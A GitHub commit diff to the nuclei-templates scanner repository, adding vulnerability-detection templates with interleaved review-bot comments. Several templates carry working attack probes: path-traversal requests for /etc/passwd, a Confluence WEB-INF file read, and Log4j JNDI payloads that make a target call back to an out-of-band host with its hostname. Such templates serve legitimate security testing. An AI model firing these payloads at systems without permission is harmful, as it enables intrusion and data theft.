Merge pull request #1 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2021-12-21 21:49:53 +05:30 committed by GitHub
commit 34ca3272e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
42 changed files with 1926 additions and 1170 deletions


@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----


@ -25,7 +25,7 @@ jobs:
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
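Review bot: The new install line `go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev` resolves whatever the `dev` branch points to at workflow run time, so the tool that rewrites files in this repository is pulled unpinned from a moving ref on every run. Pinning to a tagged release or a commit hash, e.g. `go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@<release-tag-or-commit>`, keeps the CI step reproducible and makes it auditable which version produced a given annotation commit. The `run:` block belongs to a step whose definition starts before this hunk.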


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 922 | daffainfo | 354 | cves | 928 | info | 921 | http | 2517 |
| lfi | 383 | dhiyaneshdk | 342 | vulnerabilities | 353 | high | 696 | file | 57 |
| panel | 324 | pikpikcu | 287 | exposed-panels | 324 | medium | 528 | network | 47 |
| xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 271 | geeknik | 172 | exposures | 196 | low | 167 | | |
| exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| tech | 233 | pussycat0x | 94 | token-spray | 133 | | | | |
| rce | 231 | gy741 | 91 | takeovers | 65 | | | | |
| cve2021 | 192 | 0x_akoko | 79 | default-logins | 63 | | | | |
| wp-plugin | 187 | princechaddha | 72 | file | 57 | | | | |
| cve | 928 | daffainfo | 359 | cves | 934 | info | 936 | http | 2546 |
| lfi | 389 | dhiyaneshdk | 342 | vulnerabilities | 362 | high | 705 | file | 57 |
| panel | 331 | pikpikcu | 287 | exposed-panels | 331 | medium | 531 | network | 47 |
| xss | 291 | pdteam | 221 | technologies | 227 | critical | 328 | dns | 12 |
| wordpress | 273 | geeknik | 173 | exposures | 196 | low | 169 | | |
| exposure | 251 | dwisiswant0 | 158 | misconfiguration | 165 | | | | |
| rce | 235 | pussycat0x | 94 | token-spray | 138 | | | | |
| tech | 234 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 198 | 0x_akoko | 82 | default-logins | 63 | | | | |
| wp-plugin | 188 | princechaddha | 76 | file | 57 | | | | |
**192 directories, 2705 files**.
**194 directories, 2742 files**.
</td>
</tr>
@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 922 | daffainfo | 354 | cves | 928 | info | 921 | http | 2517 |
| lfi | 383 | dhiyaneshdk | 342 | vulnerabilities | 353 | high | 696 | file | 57 |
| panel | 324 | pikpikcu | 287 | exposed-panels | 324 | medium | 528 | network | 47 |
| xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 271 | geeknik | 172 | exposures | 196 | low | 167 | | |
| exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| tech | 233 | pussycat0x | 94 | token-spray | 133 | | | | |
| rce | 231 | gy741 | 91 | takeovers | 65 | | | | |
| cve2021 | 192 | 0x_akoko | 79 | default-logins | 63 | | | | |
| wp-plugin | 187 | princechaddha | 72 | file | 57 | | | | |
| cve | 928 | daffainfo | 359 | cves | 934 | info | 936 | http | 2546 |
| lfi | 389 | dhiyaneshdk | 342 | vulnerabilities | 362 | high | 705 | file | 57 |
| panel | 331 | pikpikcu | 287 | exposed-panels | 331 | medium | 531 | network | 47 |
| xss | 291 | pdteam | 221 | technologies | 227 | critical | 328 | dns | 12 |
| wordpress | 273 | geeknik | 173 | exposures | 196 | low | 169 | | |
| exposure | 251 | dwisiswant0 | 158 | misconfiguration | 165 | | | | |
| rce | 235 | pussycat0x | 94 | token-spray | 138 | | | | |
| tech | 234 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 198 | 0x_akoko | 82 | default-logins | 63 | | | | |
| wp-plugin | 188 | princechaddha | 76 | file | 57 | | | | |


@ -0,0 +1,30 @@
id: CVE-2015-0554
info:
name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
author: daffainfo
severity: high
description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
reference:
- https://www.exploit-db.com/exploits/35721
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
tags: cve,cve2015,pirelli,router,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/wlsecurity.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var wpapskkey"
- "var WscDevPin"
- "var sessionkey"
condition: and
- type: status
status:
- 200
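Review bot: The new CVE-2015-0554 template has no `classification:` block, while the other CVE templates added in this commit (CVE-2018-15138, CVE-2021-26085, CVE-2021-44848, CVE-2021-45092) carry `cvss-metrics`, `cvss-score`, `cve-id` and `cwe-id`; CVE-2015-2166 is missing it in the same way. Adding at least `cve-id: CVE-2015-0554` together with the score and CWE from the NVD record already listed under `reference` keeps the new files uniform and saves a later annotation pass. The `description` is also a single long plain scalar; a `>-` folded block would keep it within the line-length limit without changing the value.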


@ -0,0 +1,27 @@
id: CVE-2015-2166
info:
name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
tags: cve,cve2015,lfi,ericsson
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200
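Review bot: The body regex `root:.*:0:0` on the new CVE-2015-2166 template differs from the `root:[x*]:0:0` form used by the other new traversal templates in this commit (CVE-2018-15138, asanhamayesh-lfi, groupoffice-lfi, pacsone-server-lfi), and `.*` accepts any text between the fields, so a page that merely echoes `root:` and `:0:0` on the same line would count as a hit. Using the shared form, `- "root:[x*]:0:0"`, keeps the passwd-file check consistent and tighter across templates.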


@ -19,14 +19,15 @@ info:
network:
- host:
- "{{Host}}:22"
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
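Review bot: In the rewritten matcher regex `'(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'` the second alternative's class `[\n^\r]` is not negated — `^` only negates in the first position, so here it is a literal caret and the class matches only LF, `^` or CR. Banners for OpenSSH 7.0–7.2 therefore fail the match, while the first alternative handles 1.x–6.x correctly with `[^\r\n]+`. Use the same class in both branches: `- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][^\r\n]+)'`. The `network:` entry and the template's `info` block start before this hunk.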


@ -0,0 +1,32 @@
id: CVE-2018-15138
info:
name: LG-Ericsson iPECS NMS 30M Directory Traversal
author: 0x_Akoko
severity: high
description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
reference:
- https://cxsecurity.com/issue/WLB-2018080070
- https://nvd.nist.gov/vuln/detail/CVE-2018-15138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
tags: cve,cve2018,ericsson,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
- "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: CVE-2021-26085
info:
name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
author: princechaddha
severity: medium
description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
reference:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
tags: cve,cve2021,confluence,atlassian,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-26085
cwe-id: CWE-862
requests:
- method: GET
path:
- "{{BaseURL}}/s/123cfx/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<display-name>Confluence</display-name>"
- "com.atlassian.confluence.setup.ConfluenceAppConfig"
condition: and


@ -3,12 +3,17 @@ id: CVE-2021-40856
info:
name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
author: gy741
severity: medium
severity: high
description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
tags: cve,cve2021,comfortel,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-40856
cwe-id: CWE-287
requests:
- raw:


@ -2,7 +2,7 @@ id: CVE-2021-44228
info:
name: Remote code injection in Log4j
author: melbadry9,dhiyaneshDK,daffainfo
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
@ -10,16 +10,35 @@ info:
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
tags: cve,cve2021,rce,oast,log4j
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2021-44228
cwe-id: CWE-502
requests:
- raw:
- |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -31,11 +50,17 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
extractors:
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
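Review bot: The inline comment on the new matcher regex, `# Print extracted ${hostName} in output`, was copied from the extractor below; a matcher prints nothing, and the sibling log4j templates in this commit label the equivalent line `# Match for extracted ${hostName} variable`, which is the wording to use here. The new four-group pattern `([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+` with `group: 2` for the injection point and `group: 1` for `${hostName}` appears to assume the interactsh domain has exactly three labels after the injection-point label; on a self-hosted interactsh server with a different label depth the capture groups would shift, so a short comment stating that assumption would help the next maintainer. The `requests` entry this hunk belongs to starts before it.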


@ -0,0 +1,36 @@
id: CVE-2021-44848
info:
name: Thinfinity VirtualUI User Enumeration
author: danielmofer
severity: medium
description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)
reference:
- https://github.com/cybelesoft/virtualui/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-44848
tags: cve,cve2021,exposure,thinfinity
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-44848
cwe-id: CWE-287
requests:
- raw:
- |
GET /changePassword?username=administrator HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"rc":(.*?)'
- '"msg":"(.*?)"'
condition: and
- type: status
status:
- 200
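Review bot: The first body regex in the new CVE-2021-44848 template, `'"rc":(.*?)'`, ends with a lazy group that matches the empty string, so it is equivalent to the literal `"rc":` and the capture serves no purpose. Together with `'"msg":"(.*?)"'` the matcher only confirms that the response is JSON carrying `rc` and `msg` keys, which a patched server may return as well; if the detection relies on the response differing for existing and non-existing users, as the description says, the matcher should check the discriminating value rather than the key names. At minimum drop the empty group: `- '"rc":'`.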


@ -13,6 +13,11 @@ info:
metadata:
google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
tags: cve,cve2021,hdnetwork,lfi,iot,camera
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-45043
cwe-id: CWE-22
requests:
- raw:


@ -0,0 +1,29 @@
id: CVE-2021-45092
info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-45092
tags: cve,cve2021,injection,iframe,thinfinity
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-45092
cwe-id: CWE-74
requests:
- method: GET
path:
- "{{BaseURL}}/lab.html?vpath=//example.com"
matchers:
- type: regex
regex:
- ".*vpath.*"
- "thinfinity"
condition: and
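Review bot: The second reference on the new CVE-2021-45092 template, `https://nvd.nist.gov/vuln/detail/CVE-2021-44848`, points to a different CVE (the user-enumeration issue added in this same commit); it should read `- https://nvd.nist.gov/vuln/detail/CVE-2021-45092`, matching `cve-id` and the Tenable link below it. The matcher regex `.*vpath.*` only checks that the parameter name appears somewhere in the body, not that the supplied value was reflected, so any page echoing the query string would match; matching the reflected value and adding a `status` matcher, as the other new templates do, would cut false positives.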


@ -26,6 +26,7 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "zabbix.php?action=dashboard.view"


@ -0,0 +1,25 @@
id: craftcms-admin-panel
info:
name: Craft CMS admin panel
author: Supras
severity: info
metadata:
shodan-query: "X-Powered-By: Craft CMS"
tags: panel,craftcms
requests:
- method: GET
path:
- '{{BaseURL}}/admin/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'title="Powered by Craft CMS"'
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: emerson-power-panel
info:
name: Emerson Network Power IntelliSlot Web Card Panel
author: princechaddha
severity: info
metadata:
shodan-dork: 'http.title:"Emerson Network Power IntelliSlot Web Card"'
tags: panel,intellislot,emerson
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Emerson Network Power IntelliSlot Web Card</title>"
- type: status
status:
- 200
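Review bot: The metadata key `shodan-dork` on the new emerson-power-panel template differs from `shodan-query`, which the other panel and tech templates added in this commit use (craftcms-admin-panel, thinfinity-virtualui-panel, wordpress-detect). Tooling that reads `metadata.shodan-query` will not see this entry; rename it to `shodan-query: 'http.title:"Emerson Network Power IntelliSlot Web Card"'`.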


@ -0,0 +1,24 @@
id: emessage-panel
info:
name: Emessage Panel Detect
author: ffffffff0x
severity: info
metadata:
fofa-query: title="emessage"
tags: panel,emessage
requests:
- method: GET
path:
- "{{BaseURL}}/login.jsp"
matchers-condition: and
matchers:
- type: regex
regex:
- '(?i)<title>emessage.*</title>'
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: thinfinity-virtualui-panel
info:
name: Thinfinity VirtualUI Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: 'http.title:"Thinfinity VirtualUI"'
tags: panel,thinfinity,virtualui
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Thinfinity VirtualUI</title>"
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: springboot-gateway
info:
name: Detect Spring Gateway Actuator
author: wdahlenb
severity: medium
description: Sensitive environment variables may not be masked
tags: springboot,exposure
reference: https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/
requests:
- method: GET
path:
- "{{BaseURL}}/gateway/routes"
- "{{BaseURL}}/actuator/gateway/routes"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "predicate"
- "route_id"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
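Review bot: The `description` on the new springboot-gateway template, `Sensitive environment variables may not be masked`, does not say what the template actually finds: that the Spring Cloud Gateway actuator routes endpoint (`/gateway/routes` or `/actuator/gateway/routes`) answers with the route definitions without any authentication. Something like `description: Spring Cloud Gateway actuator routes endpoint is reachable without authentication and discloses the configured route definitions.` describes the finding; the linked reference remains the pointer to the wider impact. `reference` is also given as a bare string here while the other new templates use a list; both forms load, but a list keeps the files uniform.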


@ -0,0 +1,30 @@
id: cowrie-honeypot-detect
info:
name: Cowrie SSH Honeypot Detect
author: thesubtlety
severity: info
reference:
- https://web.archive.org/web/20170826075224/https://morris.sc/detecting-kippo-ssh-honeypots/
- https://github.com/blazeinfosec/detect-kippo-cowrie/blob/master/detectKippoCowrie.py
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/detect_kippo.rb
tags: network,ssh,honeypot
network:
- host:
- '{{Hostname}}'
- '{{Host}}:22'
inputs:
- data: "\n"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'SSH\-([0-9.-A-Za-z_ ]+)'
- type: word
words:
- Invalid SSH identification string
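Review bot: In the new cowrie-honeypot-detect template the regex `'SSH\-([0-9.-A-Za-z_ ]+)'` contains `.-A` inside the character class, which the regex engine reads as a range from `.` (0x2E) to `A` (0x41), silently admitting `/`, `:`, `;`, `<`, `=`, `>`, `?` and `@` — almost certainly not the intent, which was a literal hyphen. Move the hyphen to the end of the class: `- 'SSH-([0-9A-Za-z_. -]+)'`. The word matcher that follows omits `part:` while the regex matcher above it sets `part: body`; stating it on both keeps the two matchers consistent.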


@ -13521,11 +13521,6 @@ requests:
words:
- errmag
- type: word
name: w3-total-cache
words:
- "<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/"
- type: word
name: w7-officialaccounts
words:
@ -14107,21 +14102,6 @@ requests:
words:
- wishoa_webplugin.js
- type: word
name: wordpress
words:
- /wp-content/themes/
- type: word
name: wordpress
words:
- 'name="generator" content="wordpress '
- type: word
name: wordpress
words:
- /wp-includes/
- type: word
name: wosign-ssl-cert
words:


@ -0,0 +1,36 @@
id: tableau-server-detect
info:
name: Detect Tableau Server
author: TechbrunchFR
description: Detects Tableau Server and extract the buildId
severity: info
tags: tech,tableau
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: word
part: header
words:
- "X-Tableau: Tableau Server"
- "Server: Tableau"
condition: or
- type: word
part: body
words:
- "VizPortalRun"
- "vizportal"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'data-buildId="([0-9a-z_]*)'
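Review bot: The extractor regex `'data-buildId="([0-9a-z_]*)'` on the new tableau-server-detect template uses `*`, so it also succeeds on `data-buildId=""` and emits an empty string as the build id; `'data-buildId="([0-9a-z_]+)'` only extracts when there is a value. The description `Detects Tableau Server and extract the buildId` should read `Detects Tableau Server and extracts the buildId`.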


@ -401,13 +401,6 @@ requests:
condition: or
part: body
- type: regex
name: wordpress-super-cache
regex:
- <!--[^>]+WP-Super-Cache
condition: or
part: body
- type: regex
name: comandia
regex:
@ -1087,14 +1080,6 @@ requests:
condition: or
part: body
- type: regex
name: wordpress
regex:
- <link rel=["']stylesheet["'] [^>]+/wp-(?:content|includes)/
- <link[^>]+s\d+\.wp\.com
condition: or
part: body
- type: regex
name: pygments
regex:
@ -2247,13 +2232,6 @@ requests:
condition: or
part: body
- type: regex
name: yoast-seo
regex:
- <!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -
condition: or
part: body
- type: regex
name: milligram
regex:


@ -0,0 +1,40 @@
id: wordpress-detect
info:
name: WordPress Detection
author: pdteam
severity: info
tags: tech,wordpress
metadata:
shodan-query: http.component:"WordPress"
requests:
- method: GET
path:
- "{{RootURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: regex
regex:
- '<link[^>]+s\d+\.wp\.com'
- '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -'
- '<!--[^>]+WP-Super-Cache'
condition: or
- type: word
words:
- '/wp-content/themes/'
- '/wp-includes/'
- 'name="generator" content="wordpress'
- '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'
condition: or
extractors:
- type: regex
group: 1
regex:
- 'content="WordPress ([0-9.]+)"'
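Review bot: The word matcher in the new wordpress-detect template lists `'name="generator" content="wordpress'` and `'<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'` in lower case, while the extractor below expects the real-cased `content="WordPress ([0-9.]+)"`. A nuclei word matcher compares case-sensitively unless `case-insensitive: true` is set, so as written these two entries only fire on pages that emit the markup in lower case; either add `case-insensitive: true` to that matcher or use the original casing of the strings. The lower-case forms were presumably carried over from the tech-detect.yaml entries removed elsewhere in this commit, where a different matching setup may have applied — worth confirming before relying on them.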


@ -15,9 +15,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "gotmls"
part: header
- type: status
status:
@ -27,4 +27,4 @@ requests:
- type: kval
part: header
kval:
- Location
- location


@ -0,0 +1,27 @@
id: api-bitrise
info:
name: Bitrise API Test
author: daffainfo
severity: info
reference:
- https://api-docs.bitrise.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Continous%20Integration/Bitrise.md
tags: token-spray,bitrise
self-contained: true
requests:
- raw:
- |
GET https://api.bitrise.io/v0.1/me HTTP/1.1
Host: api.bitrise.io
Authorization: {{token}}
matchers:
- type: word
part: body
words:
- '"username":'
- '"slug":'
- '"email":'
condition: and


@ -0,0 +1,26 @@
id: api-web3storage
info:
name: Web3 Storage API Test
author: daffainfo
severity: info
reference:
- https://docs.web3.storage/
- https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md
tags: token-spray,web3storage
self-contained: true
requests:
- raw:
- |
GET https://api.web3.storage/user/uploads HTTP/1.1
Host: api.web3.storage
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"created"'
- '"cid"'
condition: and


@ -0,0 +1,33 @@
id: apache-ofbiz-log4j-rce
info:
name: Apache OFBiz Log4j JNDI RCE
author: pdteam
severity: critical
tags: ofbiz,oast,log4j,rce,apache
requests:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
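Review bot: The new apache-ofbiz-log4j-rce template has no `description` or `reference` under `info`, unlike the MobileIron and CVE-2021-44228 templates in this same commit, so a user reading the result has no pointer to what is being reported. Add at least a `reference:` list to the advisory and the CVE record (`- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q`, `- https://nvd.nist.gov/vuln/detail/CVE-2021-44228`) and a one-line description; the Log4j wording used on the MobileIron template can be reused.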


@ -26,11 +26,11 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
